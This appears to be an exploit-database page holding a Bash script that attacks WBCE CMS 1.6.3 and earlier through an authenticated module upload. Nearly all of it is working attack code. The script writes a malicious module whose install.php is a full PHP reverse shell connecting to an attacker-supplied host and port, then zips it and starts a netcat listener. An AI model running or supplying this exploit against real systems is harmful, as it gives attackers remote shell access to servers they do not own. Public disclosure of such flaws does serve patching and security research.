881542919e
7 changes to exploits/shellcodes/ghdb DataEase 2.4.0 - Database Configuration Information Exposure Palo Alto Networks Expedition 1.2.90.1 - Admin Account Takeover Watcharr 1.43.0 - Remote Code Execution (RCE) WBCE CMS 1.6.3 - Authenticated Remote Code Execution (RCE) Backup and Staging by WP Time Capsule 1.22.21 - Unauthenticated Arbitrary File Upload Reservit Hotel 2.1 - Stored Cross-Site Scripting (XSS)
199 lines
No EOL
4.7 KiB
Bash
Executable file
199 lines
No EOL
4.7 KiB
Bash
Executable file
# Exploit Title: WBCE CMS <= v1.6.3 Authenticated Remote Code Execution (RCE)
|
|
# Date: 3/22/2025
|
|
# Exploit Author: Swammers8
|
|
# Vendor Homepage: https://wbce-cms.org/
|
|
# Software Link: https://github.com/WBCE/WBCE_CMS
|
|
# Version: 1.6.3 and prior
|
|
# Tested on: Ubuntu 24.04.2 LTS
|
|
# YouTube Demonstration: https://youtu.be/Dhg5gRe9Dzs?si=-WQoiWU1yqvYNz1e
|
|
# Github: https://github.com/Swammers8/WBCE-v1.6.3-Authenticated-RCE
|
|
|
|
#!/bin/bash
|
|
|
|
# Make a zip file exploit
|
|
# Start netcat listener
|
|
|
|
if [[ $# -ne 2 ]]; then
|
|
echo "[*] Description:"
|
|
echo "[*] This is an Authenticated RCE exploit for WBCE CMS version <= 1.6.3"
|
|
echo "[*] It will create an infected module .zip file and start a netcat listener."
|
|
echo "[*] Once the zip is created, you will have to login to the admin page"
|
|
echo "[*] to upload and install the module, which will immediately run the shell"
|
|
echo "[*] Shell taken from: https://github.com/pentestmonkey/php-reverse-shell/tree/master"
|
|
echo "[!] Usage:"
|
|
echo "[*] $0 <lhost> <lport>"
|
|
exit 1
|
|
fi
|
|
|
|
if [ -z "$(which nc)" ]; then
|
|
echo "[!] Netcat is not installed."
|
|
exit 1
|
|
fi
|
|
|
|
ip=$1
|
|
port=$2
|
|
|
|
rm -rf shellModule.zip
|
|
rm -rf shellModule
|
|
mkdir shellModule
|
|
|
|
echo [*] Crafting Payload
|
|
|
|
cat <<EOF > shellModule/info.php
|
|
<?php
|
|
/**
|
|
*
|
|
* @category modules
|
|
* @package Reverse Shell
|
|
* @author Swammers8
|
|
* @link https://swammers8.github.io/
|
|
* @license http://www.gnu.org/licenses/gpl.html
|
|
* @platform example.com
|
|
* @requirements PHP 5.6 and higher
|
|
* @version 1.3.3.7
|
|
* @lastmodified May 22 2025
|
|
*
|
|
*
|
|
*/
|
|
|
|
\$module_directory = 'modshell';
|
|
\$module_name = 'Reverse Shell';
|
|
\$module_function = 'page';
|
|
\$module_version = '1.3.3.7';
|
|
\$module_platform = '2.10.x';
|
|
|
|
\$module_author = 'Swammers8';
|
|
\$module_license = 'GNU General Public License';
|
|
\$module_description = 'This module is a backdoor';
|
|
|
|
?>
|
|
EOF
|
|
|
|
cat <<EOF > shellModule/install.php
|
|
<?php
|
|
set_time_limit (0);
|
|
\$VERSION = "1.0";
|
|
\$ip = '$ip'; // CHANGE THIS
|
|
\$port = $port; // CHANGE THIS
|
|
\$chunk_size = 1400;
|
|
\$write_a = null;
|
|
\$error_a = null;
|
|
\$shell = 'uname -a; w; id; /bin/sh -i';
|
|
\$daemon = 0;
|
|
\$debug = 0;
|
|
|
|
if (function_exists('pcntl_fork')) {
|
|
\$pid = pcntl_fork();
|
|
if (\$pid == -1) {
|
|
printit("ERROR: Can't fork");
|
|
exit(1);
|
|
}
|
|
|
|
if (\$pid) {
|
|
exit(0); // Parent exits
|
|
}
|
|
|
|
if (posix_setsid() == -1) {
|
|
printit("Error: Can't setsid()");
|
|
exit(1);
|
|
}
|
|
|
|
\$daemon = 1;
|
|
} else {
|
|
printit("WARNING: Failed to daemonise. This is quite common and not fatal.");
|
|
}
|
|
|
|
chdir("/");
|
|
|
|
umask(0);
|
|
|
|
|
|
\$sock = fsockopen(\$ip, \$port, \$errno, \$errstr, 30);
|
|
if (!\$sock) {
|
|
printit("\$errstr (\$errno)");
|
|
exit(1);
|
|
}
|
|
|
|
\$descriptorspec = array(
|
|
0 => array("pipe", "r"), // stdin is a pipe that the child will read from
|
|
1 => array("pipe", "w"), // stdout is a pipe that the child will write to
|
|
2 => array("pipe", "w") // stderr is a pipe that the child will write to
|
|
);
|
|
|
|
\$process = proc_open(\$shell, \$descriptorspec, \$pipes);
|
|
|
|
if (!is_resource(\$process)) {
|
|
printit("ERROR: Can't spawn shell");
|
|
exit(1);
|
|
}
|
|
|
|
stream_set_blocking(\$pipes[0], 0);
|
|
stream_set_blocking(\$pipes[1], 0);
|
|
stream_set_blocking(\$pipes[2], 0);
|
|
stream_set_blocking(\$sock, 0);
|
|
|
|
printit("Successfully opened reverse shell to \$ip:\$port");
|
|
|
|
while (1) {
|
|
if (feof(\$sock)) {
|
|
printit("ERROR: Shell connection terminated");
|
|
break;
|
|
}
|
|
|
|
if (feof(\$pipes[1])) {
|
|
printit("ERROR: Shell process terminated");
|
|
break;
|
|
}
|
|
|
|
\$read_a = array(\$sock, \$pipes[1], \$pipes[2]);
|
|
\$num_changed_sockets = stream_select(\$read_a, \$write_a, \$error_a, null);
|
|
|
|
if (in_array(\$sock, \$read_a)) {
|
|
if (\$debug) printit("SOCK READ");
|
|
\$input = fread(\$sock, \$chunk_size);
|
|
if (\$debug) printit("SOCK: \$input");
|
|
fwrite(\$pipes[0], \$input);
|
|
}
|
|
|
|
if (in_array(\$pipes[1], \$read_a)) {
|
|
if (\$debug) printit("STDOUT READ");
|
|
\$input = fread(\$pipes[1], \$chunk_size);
|
|
if (\$debug) printit("STDOUT: \$input");
|
|
fwrite(\$sock, \$input);
|
|
}
|
|
|
|
if (in_array(\$pipes[2], \$read_a)) {
|
|
if (\$debug) printit("STDERR READ");
|
|
\$input = fread(\$pipes[2], \$chunk_size);
|
|
if (\$debug) printit("STDERR: \$input");
|
|
fwrite(\$sock, \$input);
|
|
}
|
|
}
|
|
|
|
fclose(\$sock);
|
|
fclose(\$pipes[0]);
|
|
fclose(\$pipes[1]);
|
|
fclose(\$pipes[2]);
|
|
proc_close(\$process);
|
|
|
|
function printit (\$string) {
|
|
if (!\$daemon) {
|
|
print "\$string\n";
|
|
}
|
|
}
|
|
|
|
?>
|
|
EOF
|
|
|
|
echo [*] Zipping to shellModule.zip
|
|
zip -r shellModule.zip shellModule
|
|
rm -rf shellModule
|
|
echo [*] Please login to the WBCE admin panel to upload and install the module
|
|
echo [*] Starting listener
|
|
|
|
nc -lvnp $port
|
|
|
|
echo
|
|
echo
|
|
echo "[*] Done!"
|
|
echo "[*] Make sure to uninstall the module named 'Reverse Shell' in the module page" |